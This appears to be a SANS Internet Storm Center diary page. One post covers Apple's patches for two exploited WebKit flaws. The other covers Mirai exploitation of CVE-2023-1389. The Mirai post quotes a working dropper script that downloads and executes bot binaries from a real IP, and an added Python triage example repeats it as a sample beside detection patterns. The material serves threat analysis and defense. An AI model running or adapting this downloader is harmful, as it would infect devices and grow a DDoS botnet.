Apple Patches Exploited WebKit Vulnerabilities in iOS/iPadOS/macOS

    Published: 2023-11-30
    Last Updated: 2023-11-30 18:48:28 UTC
    by Johannes Ullrich (Version: 1)
    0 comment(s)

    Apple today released patches for two WebKit vulnerabilities affecting macOS, iPadOS and iOS. I would expect standalone Safari updates for older macOS versions in the future. At this point, only the most recent operating system versions received patches.

    The vulnerabilities have been exploited against versions of iOS before 16.7.1. iOS 16.7.2 is the latest iOS 16 release, released in late October. It is not clear if it is vulnerable. Apple just states which versions were successfully exploited. 

    Patched in: iOS 17.1.2 and iPadOS 17.1.2 | macOS Sonoma 14.1.2 (an "x" marks each release that carries the fix)

    CVE-2023-42916 [moderate] WebKit
      An out-of-bounds read was addressed with improved input validation.
      Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.
      iOS/iPadOS 17.1.2: x | macOS Sonoma 14.1.2: x

    CVE-2023-42917 [critical] WebKit
      A memory corruption vulnerability was addressed with improved locking.
      Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.
      iOS/iPadOS 17.1.2: x | macOS Sonoma 14.1.2: x

    ---
    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


    Prophetic Post by Intern on CVE-2023-1389 Foreshadows Mirai Botnet Expansion Today

    Published: 2023-11-30
    Last Updated: 2023-11-30 03:34:23 UTC
    by John Bambenek (Version: 1)
    0 comment(s)

    Last week, Jonah Latimer posted here about traffic he saw to his own EC2 web honeypot exploiting CVE-2023-1389. I found this while looking at new URL strings hitting our honeypot network, and so far on 29 Nov 23 there have been about 300 detections for this vulnerability pulling a shell script from 45.95.146.26. It is a quick little shell script that does little more than figure out the architecture of the victim device and then attempt to download an architecture-specific variant of Mirai.

    binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
    server_ip="45.95.146.26"
    binout="system"
    exec="your device just got infected to a bootnoot"
    rm -rf $binout
    for arch in $binarys
      do
        rm -rf $arch
        cd /tmp || cd /var || cd /dev; wget http://$server_ip/g/$arch -O $binout || curl -O $binout http://$server_ip/g/$arch || tftp -g -l $binout -r $arch $server_ip
        chmod 777 $binout
        status=`./$binout $1`
        if [ "$status" = "$exec" ]; then
            rm -rf $binout
            break
        fi
        rm -rf $binout
      done

    The same IP hosted those binaries, which were first seen on VirusTotal on 24 November 2023 (see the ARM version report on VT here).
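    For triaging dropped scripts like the one above, here is an added example (not code from the diary or from ISC) that scores a shell script against the multi-architecture IoT downloader pattern: an architecture list, a wget/curl/tftp fallback chain, a hop through world-writable directories, and a chmod-then-execute step. The sample inputs are constructed; the downloader sample is a trimmed copy of the script quoted in the post, and the indicator names and thresholds are this example's own choices.

```python
import re

# Constructed sample: a trimmed copy of the downloader quoted in the diary
# (server IP, path and architecture list as reported; not the complete file).
SAMPLE_DOWNLOADER = """binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="45.95.146.26"
binout="system"
for arch in $binarys
  do
    cd /tmp || cd /var || cd /dev; wget http://$server_ip/g/$arch -O $binout || curl -O $binout http://$server_ip/g/$arch || tftp -g -l $binout -r $arch $server_ip
    chmod 777 $binout
    status=`./$binout $1`
  done
"""

# Constructed benign script for contrast: one fetch tool, a normal install path.
SAMPLE_BENIGN = """#!/bin/sh
apt-get update && apt-get install -y curl
cd /opt/app && ./run.sh
"""

# Architecture names commonly seen in Mirai-family download loops (hypothetical list).
ARCH_TOKENS = {"mips", "mpsl", "x86", "arm", "arm5", "arm6", "arm7", "sh4", "ppc", "arc", "m68k"}

CHECKS = {
    # three or more architecture names inside a single quoted assignment
    "multi_arch_list": lambda s: any(len(ARCH_TOKENS & set(v.split())) >= 3
                                     for v in re.findall(r'="([^"]*)"', s)),
    # two or more fetch tools on one line, chained with || so one works on a minimal box
    "fetch_fallback_chain": lambda s: any(len(re.findall(r"\b(wget|curl|tftp)\b", ln)) >= 2
                                          and "||" in ln for ln in s.splitlines()),
    # hop through world-writable directories before fetching
    "writable_dir_hop": lambda s: re.search(r"cd /tmp \|\| cd /(var|dev)", s) is not None,
    # make the dropped file executable, then run it from the current directory
    "chmod_then_exec": lambda s: re.search(r"chmod (777|\+x)", s) is not None
                                 and re.search(r"\./\$\w+", s) is not None,
}


def extract_hosts(script: str) -> set[str]:
    """Collect IPv4 literals, which in these droppers are the download servers."""
    return set(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", script))


def triage(script: str) -> dict:
    """Return the indicators that fired, a score (count of hits) and extracted hosts."""
    hits = [name for name, check in CHECKS.items() if check(script)]
    return {"indicators": hits, "score": len(hits), "hosts": extract_hosts(script)}


if __name__ == "__main__":
    print(triage(SAMPLE_DOWNLOADER))  # score 4, hosts {'45.95.146.26'}
    print(triage(SAMPLE_BENIGN))      # score 0, no hosts
```

    The extracted hosts feed directly into blocklists or VirusTotal lookups, as the post does with the same IP.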

    If you take a look at our own data and generalize the exploit (example here), you see one spike in August, a roughly constant low "noise level" of exploitation otherwise, and then today, which so far has surpassed all our previous observations of exploit activity.

    The mitigation advice is the same: these devices probably shouldn't have internet-facing admin panels. Unfortunately, the class of device suggests the people running them are not likely to be reading such guidance, much less have the ability or wherewithal to fix the issue and/or update their firmware.

    It should be pointed out that in the current environment of heightened geopolitical activity, DDoS is often the first lever used by individuals who want to project that same conflict online, which makes the expansion of Mirai that much more concerning.

    --
    John Bambenek
    bambenek \at\ gmail /dot/ com
    Bambenek Labs - Well Fed Intelligence

    ISC Stormcast For Thursday, November 30th, 2023 https://isc.sans.edu/podcastdetail/8758
